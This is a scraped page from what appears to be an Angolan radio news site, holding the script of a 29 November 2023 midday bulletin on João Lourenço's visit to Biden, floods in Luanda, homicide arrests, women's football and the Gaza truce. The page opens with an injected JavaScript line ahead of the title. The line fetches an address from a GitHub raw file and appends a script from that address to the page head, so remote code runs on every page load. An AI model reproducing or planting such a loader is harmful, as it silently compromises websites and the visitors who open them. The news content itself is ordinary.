;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Jornal 12h, edição de 29 de Novembro de 2023 | RadioPlayDigital
Jornal 12h, edição de 29 de Novembro de 2023

JORNAL 12H/ZC

PRESIDENTE DA REPÚBLICA A CAMINHO DOS ESTADOS UNIDOS DA AMÉRICA PARA ENCONTRO COM O LÍDER DA MAIOR POTÊNCIA DO PLANETA;

 

– REVISTA BRITÂNICA ADMITE QUE PRESIDENTE JOÃO LOURENÇO POSSA CONCORRER PARA UM TERCEIRO MANDATO;

 

– DETIDOS EM LUANDA TRÊS PESSOAS ENVOLVIDAS NA MORTE DE UM OFICIAL SUPERIOR OCORRIDA NO PASSADO MÊS DE OUTUBRO EM VIANA;

 

– INTENSAS CHUVAS ACOMPANHADAS DE VENTOS FORTES AFECTAM MAIS DE DUAS MIL FAMÍLIAS EM LUANDA. NO KWANZA NORTE GOVERNO GARANTE APOIO À FAMÍLIA QUE PERDEU CINCO MEMBROS EM CONSEQUÊNCIA DO DESABAMENTO DA RESIDÊNCIA EM QUE MORAVAM;

 

– SELECÇÃO NACIONAL DE FUTEBOL FEMININO OBRIGADA A VENCER HOJE A ZÂMBIA PARA NÃO COMPROMETER O APURAMENTO CAN DO PRÓXIMO ANO;

 

– ATÉ AO MOMENTO JÁ FORAM LIBERTADOS 81 REFÉNS PELO HAMAS E 180 PALESTINIANOS PELAS FORÇAS ISRAELITAS DESDE O INÍCIO DO PROCESSO DE TRÉGUAS NO CONFLITO ENTRE OS DOIS TERRITÓRIOS.

JINGLE MIX

Jornal ao meio dia, quarta-feira, 29 de Novembro de 2023. Coordenação de Alves Fernandes, técnica de Edson Machado e Edmundo Simões, edição de Zacarias Congo.  

JINGLE MV

O SIC em Luanda confirma a detenção de três dos cinco cidadãos implicados no crime de homicídio em que foi vítima o superintendente-chefe da polícia nacional, Manuel Celestino Gonçalves, morto a tiro no passado dia 23 de Outubto, no Distrito Urbano da Baia, em Viana, quando tentava reagir a um assalto.

Uma matéria que estará em desenvolvimento ainda ao longo deste serviço informativo.

PONTO

O Presidente da República está a caminho dos Estados Unidos da América para o muito aguardado encontro com o líder da maior potência do planeta, no salão oval da Casa Branca, que acontece já esta quinta feira, dia 30 de Novembro. O Presidente dos Estados Unidos, Joe Biden, recebe em audiência o Presidente João Lourenço, numa altura em que as relações entre os dois países atingiram um nível de excelência, em vários domínios.

O analista em relações internacionais, Osvaldo Mboco, considera que a realização deste encontro reflete-se no reconhecimento das mudanças implementadas pelo governo de João Lourenço e fala ainda em ganhos da diplomacia angolana, tendo em conta os esforços feitos para que o Presidente da República fosse recebido por Joe Biden.

OSVALDO MBOCO 01 – 01′ 51” 12H 291123

No centro das abordagens estará ainda o Projecto de Parceria para Infraestruturas e Investimentos Globais no Corredor do Lobito, que ligará Angola, a República Democrática do Congo e a Zâmbia aos mercados globais, através do porto marítimo situado no litoral de Benguela.

Por outro lado, o analista em relações internacionais, Osvaldo Mboco, sublinha os interesses económicos dos Estados Unidos da Américo em Angola, a olhar para o contexto de estabilidade político-militar do nosso país.

OSVALDO MBOCO 02 – 02′ 52” 12H 291123

Analista em relações internacionais, Osvaldo Mboco, e o encontro entre os Presidentes João Lourenço e Joe Biden, que acontece já esta quinta feira, dia 30 de Novembro, no salão oval da Casa Branca.

O Presidente da República partiu esta manhã de Luanda com destino aos Estados Unidos da América.

Analistas da “ECONOMIST INTELLIGENCE UNIT” acreditam que o MPLA voltará a vencer as eleições em Angola, em 2027, com João Lourenço a candidatar-se a um terceiro mandato, contornando o limite de dois mandatos imposto pela Constituição angolana.

Numa antevisão de Angola para 2024-2028, a Unidade de Análise da revista britânica “THE ECONOMIST” salienta que o Presidente angolano, João Lourenço, deve eleger como prioridades no seu segundo mandato a luta contra a corrupção e a melhoria das condições de vida para recuperar a popularidade perdida.

Apesar do pouco progresso alcançado nas reformas e na diversificação económica, os analistas esperam  que João Lourenço e o MPLA mantenham o poder durante o seu segundo mandato “dado o seu forte controlo sobre o aparelho estatal”, e que o Presidente concorra a um terceiro mandato, vencendo as eleições de 2027.

O analista MFM, Carlos Rosado de Carvalho, comentou os efeitos desta eventualidade na vida nacional, com o cenário ora traçado;

CARLOS ROSADO DE CARVALHO – 03’ 02’’ 12H 291123

Sobre a economia Angola, o documento da “ECONOMIST INTELLIGENCE UNIT” traça uma cenário moderadamente optimista, segundo Carlos Rosado de Carvalho.  

CARLOS ROSADO DE CARVALHO 02 – 02’ 12’’ 12H 291123

Analista MFM, Carlos Rosado de Carvalho, considerando como moderadas as previsões sobre a economia angolana avançadas pelo ECONOMIST INTELLIGENCE UNIT.

PONTO

Voltamos à matéria de abertura deste jornal…

 

O SIC em Luanda confirma a detenção de três dos cinco cidadãos implicados no crime de homicídio em que foi vítima o superintendente-chefe da polícia nacional, Manuel Celestino Gonçalves, morto a tiro no passado dia 23 de Outubto, no Distrito Urbano da Baia, em Viana, quando tentava reagir a um assalto.

A informação foi avançada pelo porta-voz do Serviço de Investigação Criminal em Luanda, superintendente-chefe Fernando de Carvalho.

FERNANDO DE CARVALHO 01 – 01′ 10” 12H 291123

Fernando de Carvalho fala, por outro lado, da detenção de quatro pessoas envolvidas na morte de um segundo cabo das Forças Armadas Angolanas, a 21 de Outubro último.

FERNANDO DE CARVALHO 02 – 01′ 47” 12H 291123

Superintende-chefe Fernando de Carvalho, porta-voz do SIC em Luanda, e a detenção dos cidadãos implicados em dois homicídios, em que foram vítimas um superintendente-chefe da polícia nacional e um segundo cabo das Forças Armadas Angolanas. 

 

E nas últimas 24 horas a polícia em Luanda deteve vinte e duas pessoas, suspeitas de cometerem diversos crimes, tal como avança o porta-voz da corporação na capital, superintendente Nestor Goubel.

NESTOR GOUBEL – 01′ 47” 12H 291123

Superintendente Nestor Goubel, porta-voz da polícia em Luanda.

As fortes chuvas que caíram, esta terça-feira, na província de Luanda, durante mais de 12 horas, provocaram a inundação de 2.056 residências, 92 vias obstruídas e intransitáveis, bem como deixaram alagadas 16 infraestruturas públicas e privadas, sem, no entanto, qualquer registo de mortes e feridos, até ao momento.

Os dados preliminares foram avançados em conferência de imprensa pelo comandante provincial adjunto do Serviço de Protecção Civil e Bombeiros, Bravo Mendes.

BRAVO MENDES – 01’ 26’’ 12H 291123

Bravo Mendes, comandante provincial adjunto do Serviço de Protecção Civil e Bombeiros em Luanda, e os dados das chuvas que se abateram esta terça-feira sobre a capital. O município de Viana é, no entanto, o mais afectado até ao momento, seguido do Kilamba Kiaxi e Talatona.

E a olhar para os estragos causados pelas enxurradas que se têm registado nos últimos dias em Luanda, o governo provincial criou uma comissão para ajudar as famílias mais afectadas, tal como fez saber o vice-governador de Luanda para área Técnica e Infra-Estrutura, Cristino Ndeitunga.

CRISTINO NDEITUNGA – 01′ 00” 12H 291123

Cristino Ndeitunga, vice-governador de Luanda para área Técnica e Infra-Estrutura, falando sobre as medidas que visam apoiar as famílias afectadas pelas fortes chuvas que têm caído sobre a capital.

 

Ainda os estragos das chuvas um pouco por todo o país, no Kwanza Norte oito pessoas morreram em consequência das fortes chuvas, de desde 30 de Outubro até ao momento.

No entanto, os bombeiros desencorajam a construção em zonas de risco para evitar o risco de deslizamento de terra, que tem causado a destruição de residências.

O porta-voz dos bombeiros naquela província, Hélder Milagre, confirma, por outro lado, a remoção dos restos mortais dos cinco membros da mesma família que perderam a vida, na última segunda-feira, em consequência do desabamento da casa em que moravam e esclarece que a família terá o apoio da Comissão Provincial de Proteção Civil.

HÉLDER MILAGRE – 02′ 20” 12H 291123 BOM

Hélder Milagre, porta-voz dos bombeiros no Kwanza Norte, quando confirmava à MFM que a família das cinco vítimas mortais, em consequência do desamamento da casa em que moravam, receberá o apoio da Comissão Provincial de Proteção Civil.

Do Kwanza Norte seguimos ao Bengo.

Naquela província continuam a decorrer os trabalhos para o estancamento das ravinas em vários troços da região.

A informação foi avançada pelo vice-governador para os Serviços Técnicos e Infraestruturas, Edson Cruz, que fala igualmente do auto de consignação da estrada ONZO/MUXALUANDO, no município de Nambuangongo, cujas obras estão paralisadas há mais de uma década, num acto orientado pelo ministro das Obras Públicas, Urbanismo e Habitação, Carlos dos Santos, que trabalha hoje naquela província.

EDSON CRUZ – 01′ 10” 12H 291123

Edson Cruz, vice-governador do Bengo para os Serviços Técnicos e Infraestruturas, e o auto de consignação dos 17 KM da estrada ONZO-MUXALUANDO, no município de Nambuangongo.

Lembramos que aquando da inauguração da Centralidade do Bucula “Teresa Afonso Gomes” e do novo Hospital Geral do Bengo “Reverendo Guilherme Pereira Inglês”, o Presidente da República, João Lourenço, disse que só voltaria ao Bengo depois da referida estrada ser concluída.

PONTO DESPORTO

A selecção nacional de futebol feminino está obrigada a vencer a Zâmbia hoje, para não comprometer o apuramento ao Campeonato Africano de 2024, a realizar-se em Marrocos.

Angolanas e Zambianas medem forças no estádio 22 de Junho em Luanda às 16horas, no duelo referente à primeira mão da última eliminatória de acesso ao CAN do próximo ano.

O selecionador nacional, Sousa Garcia, não espera facilidade, mas revela que foi montada uma estratégia para bloquear o ataque directo.

RD-SOUSA GARCIA-PARTE 1

O adversário é conhecido, mas é de má memória, o duelo mais recente com a Zâmbia, terminou com vitória das Zambianas sobre Angola por 3-1 na Taça COSAFA.

Sobre este e outros assuntos desportivos o estimado ouvinte vai acompanhar logo a seguir a este serviço informativo com o Hilário Leonardo.

PONTO INTERNACIONAL

O número total de reféns libertados pelo Hamas desde o início na sexta-feira passada do processo de tréguas no conflito com o Israel, na Faixa de Gaza, é agora de 81, incluindo 60 israelitas – todos mulheres e crianças – e 21 cidadãos estrangeiros. Já o Israel soltou 180 palestinos que estavam presos.

Os reféns estavam entre as cerca de 240 pessoas capturadas por homens armados do Hamas durante um ataque ao sul de Israel em 7 de Outubro. O acordo mediado pelo Qatar prevê a libertação de três prisioneiros palestinos para cada refém israelita.

 

Hoje é o segundo e último dia de uma prorrogação de dois dias do cessar-fogo em Gaza. Segundo os termos do acordo, o processo de tréguas pode ser prorrogado por mais dias – até um total de 10 dias, incluindo os primeiros quatro, caso o Hamas liberte pelo menos 10 reféns por dia.

Ainda da actualidade internacional, o Vaticano confirmou, esta terça-feira, que o Papa Francisco não vai à COP28, a cimeira pela acção climática que se realiza no Dubai entre os dias 30 de Novembro e 2 de Dezembro, organizada pelas Nações Unidas.

O cancelamento da viagem surge depois de o Papa ter sentido sintomas de gripe durante os últimos dias, forçando o líder da Igreja Católica a cancelar alguns compromissos.

Data de Emissão: 29-11-2023 às 12:00
Género(s): Noticiário
 
PARTICIPANTES

Relacionados